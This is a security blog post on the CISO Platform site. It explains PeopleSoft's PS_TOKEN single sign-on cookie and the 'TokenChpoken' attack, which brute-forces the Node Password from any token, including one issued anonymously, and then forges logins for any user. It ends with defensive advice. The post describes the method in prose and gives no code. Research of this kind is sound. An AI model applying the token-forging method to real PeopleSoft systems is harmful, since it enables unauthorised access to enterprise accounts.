In the third part of the PeopleSoft Security series,we will describe on how to log-in any account and gain full access to the PeopleSoft system.

What is PeopleSoft SSO and how does it work?

Like many other enterprise business applications, PeopleSoft supports various Single Sign-On technologies. SSO enables authentication into several systems by a single action: a user logs into one system manually and into others automatically.

PeopleSoft supports its own SSO implementation based on the PS_TOKEN cookie. Here is how it works:

1. User logs into the first PeopleSoft application;

2. PeopleSoft checks the user’s credentials. If successful, it returns the session cookie and the PS_TOKEN cookie to the user;

3. When the user tries to log into another PeopleSoft server, the browser automatically sends the PS_TOKEN;

4. The second PeopleSoft server receives the PS_TOKEN, parses it, and authenticates the user if the cookie is correct.

PeopleSoft SSO

It is noteworthy that PS_TOKEN is the only element used by the servers to exchange authentications (they have no back-end connection) and it is transmitted via the client (because it’s a cookie).

There is an important term: Node. To put it simply, a node is a system participating in SSO. Any application is a separate node. One application may also contain several nodes. Each node must have a unique name.

Two settings are required to establish SSO between two servers. First, we have to specify the node name of each PeopleSoft server at the other PeopleSoft server. This is how it knows to trust the node with that name. Second, we have to give each node a Node Password which must be the same for all PeopleSoft servers.

Therefore, the PeopleSoft SSO is basically an implementation of the Pre-Shared Key technology.

There are more details about the PS_TOKEN format. Besides some additional technical fields at the beginning, it only has a few important values:

  • UserID – name of the user who has logged in
  • Lang – the user’s interface language
  • Node Name – name of the node which has authenticated the user
  • Date And Time – when the PS_TOKEN was issued
  • Signature = SHA1_Hash (UserID + Lang + Node Name + Date And Time + Node Password)

When a server gets a PS_TOKEN, it decodes the cookie (PS_TOKEN is encoded by base64), joins the four values with its Node Password, takes a SHA1 hash and compares it to the Signature in the PS_TOKEN. If they are equal, then the cookie has not been modified, so the server authenticates the user under the User ID.

TokenChpoken Attack

Does it really look very secure?

The only value in the Signature that the attacker does not already know is Node Password.

If they can find a way to get the Node Password, they can forge a PS_TOKEN cookie with any User ID value, and the Signature will be correct.

How does one get the Node Password, then?

Easily: if we have any PS_TOKEN, we can take all important values out of it, add various passwords, and hash the result. If the hash is equal to the PS_TOKEN Signature, we have guessed the Node Password.

I have written a tool called TokenChpoken which can parse, bruteforce, and recreate PS_TOKEN cookies. This attack may not seem dangerous enough as it only allows attacking systems where SSO is established, but there are two important nuances:

  • Any PeopleSoft application has at least one default local node. It is the node of the system itself. And it always trusts itself.
  • There are a lot of situations when an administrator has to set the node password for default node.

Thus, even if you have never configured SSO for your PeopleSoft and it is a standalone PeopleSoft server, somebody can still attack it in the same way because we will receive a PS_TOKEN after authentication.

User receives a PS_TOKEN after authentication

Moreover, the problem with this attack is that we need a PeopleSoft user account. In other words, it is a classical privilege escalation attack. What do we do if we have no account?

PeopleSoft design has more secrets.

It’s impossible to have access to some resources of a PeopleSoft Portal without authentication, but sometimes it’s necessary. Imagine an HRMS portal exposed to the Internet that needs to allow anonymous users to see available jobs and fill in the application form. Another typical example is password recovery: this is also a part of the system that an anonymous user can connect to.

To solve such tasks, there is a special PeopleSoft user with minimal PeopleSoft privileges and it is configured to log in automatically. So, if someone with no user account visits the anonymous PeopleSoft application functionality, PeopleSoft will automatically authenticate them as that special user, and a PS_TOKEN cookie will also be issued.

To sum up, we can attack a lot of PeopleSoft applications without any credentials.

Furthermore, PeopleSoft SSO is also used in other Oracle applications like JD Edwards. This allows attacking them under certain circumstances, too.

How to defend your PeopleSoft system:

  • Disable SSO completely (but very often it’s impossible because a part of PeopleSoft will not work at all)
  • Set up a very complex Node Password (max 24 symbols)
  • Use certificates instead of Node Passwords

by Alexey Tyurin, Head of Oracle Security at ERPScan

Votes: 0
E-mail me when people leave their comments –

You need to be a member of CISO Platform to add comments!

Join CISO Platform

Join The Community Discussion

CISO Platform

A global community of 5K+ Senior IT Security executives and 40K+ subscribers with the vision of meaningful collaboration, knowledge, and intelligence sharing to fight the growing cyber security threats.

Join CISO Community Share Your Knowledge (Post A Blog)
 

 

 

CISO Platform Talks : Security FireSide Chat With A Top CISO or equivalent (Monthly)

  • Description:

    CISO Platform Talks: Security Fireside Chat With a Top CISO

    Join us for the CISOPlatform Fireside Chat, a power-packed 30-minute virtual conversation where we bring together some of the brightest minds in cybersecurity to share strategic insights, real-world experiences, and emerging trends. This exclusive monthly session is designed for senior cybersecurity leaders looking to stay ahead in an ever-evolving landscape.

    We’ve had the privilege of…

  • Created by: Biswajit Banerjee
  • Tags: ciso, fireside chat

CISO MeetUp: Executive Cocktail Reception @ Black Hat USA , Las Vegas 2025

  • Description:

    We are excited to invite you to the CISO MeetUp: Executive Cocktail Reception if you are there at the Black Hat Conference USA, Las Vegas 2025. This event is organized by EC-Council & FireCompass with CISOPlatform as proud community partner. 

    This evening is designed for Director-level and above cybersecurity professionals to connect, collaborate, and unwind in a relaxed setting. Enjoy…

  • Created by: Biswajit Banerjee
  • Tags: black hat 2025, ciso meetup, cocktail reception, usa events, cybersecurity events, ciso

6 City Playbook Round Table Series (Delhi, Mumbai, Bangalore, Pune, Chennai, Kolkata)

  • Description:

    Join us for an exclusive 6-city roundtable series across Delhi, Mumbai, Bangalore, Pune, Chennai, and Kolkata. Curated for top cybersecurity leaders, this series will spotlight proven strategies, real-world insights, and impactful playbooks from the industry’s best.

    Network with peers, exchange ideas, and contribute to shaping the Top 100 Security Playbooks of the year.

    Date : Sept 2025 - Oct 2025

    Venue: Delhi, Mumbai, Bangalore, Pune,…

  • Created by: Biswajit Banerjee

National Insider Risk Symposium, Washington DC, USA 2025

  • Description:

    We are excited to invite you to the 10th National Insider Risk Symposium, a premier forum bringing together leaders and experts from both the commercial and public sectors to address the evolving landscape of insider threats. CISOPlatform is a proud community partner for this event. 

    Event Details:
    Venue: National Housing Center, 1201 15th St NW, Washington, D.C. 20005
    Dates: September 17–18,…

  • Created by: Biswajit Banerjee
  • Tags: national insider risk symposium, ciso, cybersecurity events, usa events